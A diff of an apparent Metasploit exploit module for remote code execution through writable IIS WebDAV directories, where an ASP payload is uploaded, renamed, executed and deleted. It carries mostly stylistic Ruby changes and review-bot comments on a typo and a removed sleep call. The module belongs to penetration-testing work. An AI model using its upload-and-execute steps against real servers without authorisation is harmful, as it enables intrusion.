diff --git a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb
index 55392c83c4..60c0e47956 100644
--- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb
+++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def initialize
 super(
 'Name' => 'Microsoft IIS WebDAV Write Access Code Execution',
- 'Description' => %q{
+ 'Description' => %q{
 This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script via a WebDAV PUT request.
@@ -40,16 +40,16 @@ class Metasploit3 < Msf::Exploit::Remote
 register_options(
 [
- # The USERNAME and PASSWORD are registered again to make them more obvious they're
- # configurable.
+ # The USERNAME and PASSWORD are registered again to make them more obvious they're
+ # configurable.
 OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']),
 OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']),
 OptString.new('PATH',
- [ true, "The path to attempt to upload", '/metasploit%RAND%.asp']),
+ [ true, 'The path to attempt to upload', '/metasploit%RAND%.asp']),
 OptEnum.new('METHOD',
- [true, 'Move or copy the file on the remote system from .txt -> .asp', 'move', ['move','copy']])
+ [ true, 'Move or copy the file on the remote system from .txt -> .asp', 'move', ['move','copy']])
 ], self.class)
 end
@@ -75,13 +75,13 @@ class Metasploit3 < Msf::Exploit::Remote
 'method' => 'GET',
 }, 20)
- if (!res)
- print_error("Connection timed out while trying to check #{path}")
+ unless res
+ print_error("Connection timed out while trying to checking #{path}")
 return
 end
- if (res.code == 200)
- print_error("File #{path} alrady exists on the target")
+ if (res.code == 200)
+ print_error("File #{path} already exists on the target")
 return
 end
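Review bot: The rewritten timeout message in the `@@ -75,13` hunk now reads "trying to checking", which is a regression from the original wording; it should stay `print_error("Connection timed out while trying to check #{path}")`. The same hunk still carries a parenthesised condition, `if (res.code == 200)`, although the commit converts the neighbouring test to `unless res`; `if res.code == 200` would match. The same leftover appears in the `@@ -186,13` hunk as `if (res.code < 200 or res.code >= 300)`, where `or` should also become `||` to avoid its low precedence. The enclosing method starts and ends outside these hunks.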
@@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
 return
 end
- if (!res)
+ unless res
 print_error("Connection timed out while uploading to #{path_tmp}")
 return
 end
@@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'headers' => {'Destination' => path}
 }, 20)
- if (!res)
+ unless res
 print_error("Connection timed out while moving to #{path}")
 return
 end
@@ -157,9 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'method' => 'GET'
 }, 20)
- sleep(2)
-
- if (!res)
+ unless res
 print_error("Execution failed on #{path} [No Response]")
 return
 end
@@ -170,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote
 when 'Not Found', 'Object Not Found'
 print_error("The #{datastore['METHOD'].upcase} action failed. Possibly IIS doesn't allow 'Script Resource Access'")
 print_warning("Try using 'set METHOD #{alt_method}' instead")
- vprint_warning("Pro Tip: Try 'set PATH /metasploit%RAND%.asp;.txt' instead") if not path.include? ";"
+ vprint_warning("Pro Tip: Try 'set PATH /metasploit%RAND%.asp;.txt' instead") unless path.include? ";"
 end
 return
 end
@@ -186,13 +184,13 @@ class Metasploit3 < Msf::Exploit::Remote
 'method' => 'DELETE'
 }, 20)
- if (!res)
+ unless res
 print_error("Deletion failed on #{path} [No Response]")
 return
 end
 if (res.code < 200 or res.code >= 300)
- # Changed this to a warning, because red is scary and if this aprt fails,
+ # Changed this to a warning, because red is scary and if this part fails,
 # honestly it's not that bad. In most cases this is probably expected anyway
 # because by default we're using IWAM_*, which doesn't give us a lot of
 # freedom to begin with.
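Review bot: Removing `sleep(2)` in the `@@ -157,9` hunk is a behaviour change inside a commit that is otherwise cosmetic, and nothing in the visible lines explains why the pause is no longer needed. The surrounding method lies outside the hunk, so this is an assumption, but if the delay gave the server time to finish the request before the later DELETE step runs, dropping it may make that cleanup fail more often and leave the uploaded file on the host under test. Either keep the call with a why-comment such as `# let the request finish before the cleanup DELETE`, or state the reason for removal in the commit message so the timing change can be reviewed separately.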